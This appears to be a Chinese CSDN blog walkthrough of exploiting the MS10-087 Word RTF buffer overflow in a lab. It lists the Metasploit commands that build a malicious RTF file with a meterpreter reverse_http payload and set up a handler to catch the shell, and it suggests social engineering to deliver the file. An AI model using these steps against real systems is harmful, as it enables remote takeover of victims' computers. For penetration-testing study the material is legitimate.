基于office渗透(MS10-087 Office(word)渗透攻击)

于 2023-01-26 16:43:13 发布
阅读量888 收藏 2
点赞数
文章标签: word microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62803993/article/details/128766214
版权

MS10-087 Office(word)渗透攻击

简介

如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。

低版本的word版本会出现RTF文件漏洞。

漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击

受影响的系统:Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for

启动msf

命令:msfconsole

img

搜索MS10_087漏洞

命令:search ms10_087

img

使用攻击模块

命令::use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

img

设置恶意文件

命令:set FILENAME ms10087.rtf

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

img

将/home/jack/.msf4/local/ms10087.rtf下的文件传到靶机上

现实中我们可以利用社会工程学的知识传到目标机上,在这里我们直接上传上去

进入multi/handler模块

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

shell

[外链图片转存中…(img-aq7Vliaz-1674722518515)]

开始攻击

命令:run

img

茶十三
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
微软MS10-087漏洞的利用
我还在的博客
09-19 2085
微软MS10-087漏洞的利用0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构0x02 利用过程1. 相互ping通2. 启动Metasploit,查找和MS10-087相关的模块3. 加载模块,设置所使用的payload4. 显示需要配置的选项,打开计算器5. 设置攻击目标,exploit6. 运行PAYLOAD 0x00 前言 这是我对微软MS10-087漏洞的利用的...
基于word文档的客户端渗透(简单易懂,小白可学)
最新发布
qq_62803993的博客
01-26 324
VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。
MS10-087微软OFFICE漏洞【参考拿机模拟】
weixin_30684743的博客
01-02 427
【声明:以下测试仅仅为了学习用途,模仿尝试与博主无关】 工 具:metasploit 目标机:windows xp sp3 步骤: 1、使用msf创建特殊代码的doc文档 命令: msfconsole 进入metasploit控制台 msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof //...
Office软件MS10-087漏洞实战
自学编程_youkewang.top
03-05 2391
0x00:实验漏洞:MS10-087,目标机器:WinXPSP3 漏洞影响范围:     0x01:进入MSF终端后查找MS10-087漏洞的攻击模块,设置攻击载荷,如图1-1.   图1-1. 0x02:查看options中需要设置的选项,如图1-2.   图1-2. 0x03:这里先设置FILENAME为:report.doc,然后设置CMD的执行内容,这里设置为弹出一个注
ms10-087(CVE-2010-3333)漏洞分析
Saber
07-04 3491
表示这个漏洞还是有很大的
计算机二级Ms-office25套Word题.doc
11-29
文档标题和描述提到的是“计算机二级Ms-office25套Word题”,这表明这是一个关于全国计算机等级考试二级MS Office应用中的Word部分的练习题集。标签进一步确认了这是针对二级MS Office考试的内容,特别是Word的练习...
documents4j-transformer-msoffice-word-0.2.zip
09-26
文档转换器documents4j-transformer-msoffice-word-0.2.zip是一个专注于Microsoft Office Word文档转换的开源项目。这个工具允许用户将Word文档转换为其他格式,如PDF,HTML或者纯文本,以便在不同的平台和系统间...
office2007-word另存为PDF
01-03
在Microsoft Office 2007中,用户有时需要将Word文档转换为PDF格式,以便于跨平台分享、打印或保持格式不变。"SaveAsPDForXPS--office2007-word另存为PDF.zip"这个文件包提供了一个工具,帮助用户在不支持直接另存为...
计算机二级考试MS-Office考试题库ppt-操作题附答案.doc
12-21
计算机二级考试MS-Office考试题库ppt-操作题附答案.doc
kail利用msf工具对ms10-087漏洞入侵渗透WinXP
qq_50854662的博客
05-27 1929
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和MS10-087相关的模块search ms10_087 3,使用exploit/windows/fileformat/ms10_087_rtf_pfragments_bof模块 use exploit/windows/fileformat/ms10_087_rtf_pfragments_
MS10_087漏洞学习研究
weixin_30402343的博客
03-29 418
类别:栈溢出,fileformat类别漏洞 描述:This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. 参考资料:《Metasploit魔鬼训练营》p276-p286 ...
ms10-070详细利用方法
H4ck3x的专栏
06-16 4905
作者:hrayha之前搞一个目标站的时候用WVS扫描,出现”asp.net padding oracle ”这么一条高危漏洞,由于之前没听说过,便到网上查了一下资料。这技术其实是去年被发现的,还有一个称呼是ms10-070,不过目前国内研究的人好像还不多,查到的资料几乎都是国外的,其实这技术的危害性还是很巨大的,就拿针对asp.net来说,可以读出web.config等一些敏感文件的内容,具体
Kali渗透测试:使用Word宏病毒进行渗透攻击
Liu_Bruce的博客
05-14 4389
Kali渗透测试:使用宏病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。宏病毒在Word中引入宏之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,宏病毒利用这一点得到了大范围的传播。 构造一个包含宏病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 宏病毒会执行, 然后感染其他文件或
office漏洞利用--获取shell
dianyan5615的博客
12-11 107
  环境:   kali系统, windows系统   流程:   在kali系统生成利用文件, kali系统下监听本地端口, windows系统打开doc文件,即可中招      第一种利用方式, 适合测试用:     从git下载代码: git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码,...
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1484
ms08_067,ms10_046
微软ms10_018漏洞的利用
我还在的博客
09-18 2750
微软ms10_018漏洞的利用0x00 前言0x01 study1. 漏洞利用环境1.1 目标机环境1.2 攻击机环境1.3 拓扑结构2. ping测试3. exploit3.1 启动Metasploit3.2 查找和MS10-018相关的模块3.3 加载模块3.4 设置PAYLOAD3.5 显示需要配置的选项3.6 设置Web服务器的地址,应为BackTrack虚拟机的地址3.7 目标主机被控制...
利用metasploit对ms10-018漏洞进行攻击实例
qq_34197314的博客
05-27 6860
  这是我的第一篇博客,用来记录我kali-liunx的探索欢迎交流学习,本次利用的漏洞为ms10-018,详细信息请参照https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2010/ms10-018攻击机:VMware 环境下Kali-liunx靶机:VMware环境下Windows xp1、首先进入metasp...
Office生成宏病毒配合msf+cobaltstrike夺取主机控制权
洞若观火
10-08 6003
启动cobaltstrike服务端并连接 #msfdb init   //初始化msf数据库 进入cobaltstrike目录下 #./teamsercer <本机ip> <设置连接密码> 生成payload 选择名为456的监听端口,x64 名为12345的监听端口,x86提权时会失败 点击复制 打开word文档 视图-->宏-->查看宏 设置宏...
Officeword渗透攻击实战案例
Goallegoal的博客
05-02 1240
Officeword渗透攻击实战案例 MS10-087 如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。 低版本的word版本会出现RTF文件漏洞。 攻击复现 msf > search ms10...
Metasploit漏洞攻击与防御实战:MS08-067与MS10-018
"本文主要介绍了如何使用Metasploit框架进行漏洞攻击实战,涵盖了MS08-067和MS10-018两个著名的漏洞。Metasploit是一款广泛使用的渗透测试工具,允许安全专家模拟攻击行为以检测系统脆弱性。" 在网络安全领域,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值